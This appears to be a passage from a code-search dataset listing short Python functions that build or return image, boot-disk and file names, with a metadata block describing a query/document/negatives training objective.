"def get_img_name(shortcut):\n name = \"Chess_{}{}t45.svg\".format(shortcut.lower(),\n \"l\" if shortcut.isupper() else \"d\")\n return name",
"def default_root_device_name(self, instance, image_meta, root_bdm):\n LOG.debug(\"default_root_device_name\")\n raise NotImplementedError()",
"def _get_image_file_name(img_path):\n\treturn img_path.rpartition('/')[-1]",
"def _prepare_boot_iso(self, task, root_uuid=None):\n node = task.node\n d_info = redfish_boot._parse_deploy_info(node)\n\n kernel_href = node.instance_info.get('kernel')\n ramdisk_href = node.instance_info.get('ramdisk')\n\n if not kernel_href or not ramdisk_href:\n\n image_href = d_info['image_source']\n\n image_properties = (\n images.get_image_properties(\n task.context, image_href, ['kernel_id', 'ramdisk_id']))\n\n if not kernel_href:\n kernel_href = image_properties.get('kernel_id')\n\n if not ramdisk_href:\n ramdisk_href = image_properties.get('ramdisk_id')\n\n if not kernel_href or not ramdisk_href:\n raise exception.InvalidParameterValue(_(\n \"Unable to find kernel or ramdisk for \"\n \"to generate boot ISO for %(node)s\") %\n {'node': task.node.uuid})\n\n bootloader_href = d_info.get('bootloader')\n\n return self._prepare_iso_image(\n task, kernel_href, ramdisk_href, bootloader_href,\n root_uuid=root_uuid)",
"def uefi_firmware_name(self):\n locator = (By.XPATH, \"//*[@id='app-psp-downloads']/section/div[2]/div[2]/div/div/div[2]/div[3]/div/div/div/ul/li[1]/p/strong\")\n return BaseElement(self.driver, locator[0], locator[1])",
"def image_name(self, image_id: int):\n image_id_expanded = \"0\" * (12 - len(str(image_id))) + str(image_id)\n if self.mode == \"train\":\n return \"COCO_train2014_\" + image_id_expanded + \".jpg\", \"COCO_val2014_\" + image_id_expanded + \".jpg\"\n elif \"2018\" in self.mode:\n return \"VisualDialog_\" + self.mode + \"_\" + image_id_expanded + \".jpg\"\n elif \"2014\" in self.mode:\n return \"COCO_\" + self.mode + \"_\" + image_id_expanded + \".jpg\"\n else:\n raise FileNotFoundError",
"def getImageBaseName(self):\r\n return \"Tiles/{0}.png\".format(self.imageBaseName)",
"def volume_get_root_name(self):\n return self.request( \"volume-get-root-name\", {\n }, {\n 'volume': [ basestring, False ],\n } )",
"def vm_bootdisk_file_name(self):\n return self._vm_bootdisk_file_name",
"def _GenerateImageNameFromLocalPath(self, image):\n realpath = osutils.ExpandPath(image)\n if not realpath.endswith('.bin'):\n raise CustomImageStagingException(\n 'Image path: %s does not end in .bin !' % realpath)\n build_name = os.path.basename(os.path.dirname(realpath))\n # Custom builds are name with the suffix of '-a1' but the build itself\n # is missing this suffix in its filesystem. Therefore lets rename the build\n # name to match the name inside the build.\n if build_name.endswith('-a1'):\n build_name = build_name[:-len('-a1')]\n\n if not self.board:\n self.board = os.path.basename(os.path.dirname(os.path.dirname(realpath)))\n return CUSTOM_BUILD_NAME % dict(board=self.board, build=build_name)",
"def _ecr_image_name_prepared(container_info: Dict) -> str:\n image_name = container_info.get('image')\n if \":\" not in image_name:\n image_name = \"%s:latest\" % image_name\n if not container_info.get('create_image') and \".dkr.ecr.\" in image_name:\n logger.info('Image already prepared in ECR.')\n return image_name\n return None",
"def get_image_filename(filename):\n base_filename=os.path.basename(filename)\n dir_filename=os.path.dirname(filename)\n rootname,ext=base_filename.split('.')\n splitrootname=rootname.split('_')\n fn=splitrootname[0]+'_'+splitrootname[1]+'_'+splitrootname[2]+'.'+ext\n tag=splitrootname[1]+'_'+splitrootname[2]\n return fn,tag",
"def boot_image(self) -> 'outputs.BootImageResponse':\n return pulumi.get(self, \"boot_image\")",
"def get_boot_file_template():\n return ''",
"def computer_name():\n return \"The name of this computer is \" + platform.node()",
"def nameRoot(node):\r\n\r\n result = node.replace(mel.eval('match( \".*|\", \"%s\" )' % node), \"\")\r\n sn = result.replace(mel.eval('match( \".*:\", \"%s\" )' % result), \"\")\r\n return sn",
"def current_filename(self):\n return \"%s_%s_%s.png\" % (LABELS[self.metadata['creating_entity']],\n SECTORS[self.metadata['sector']],\n CHANNELS[self.metadata['channel']])"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.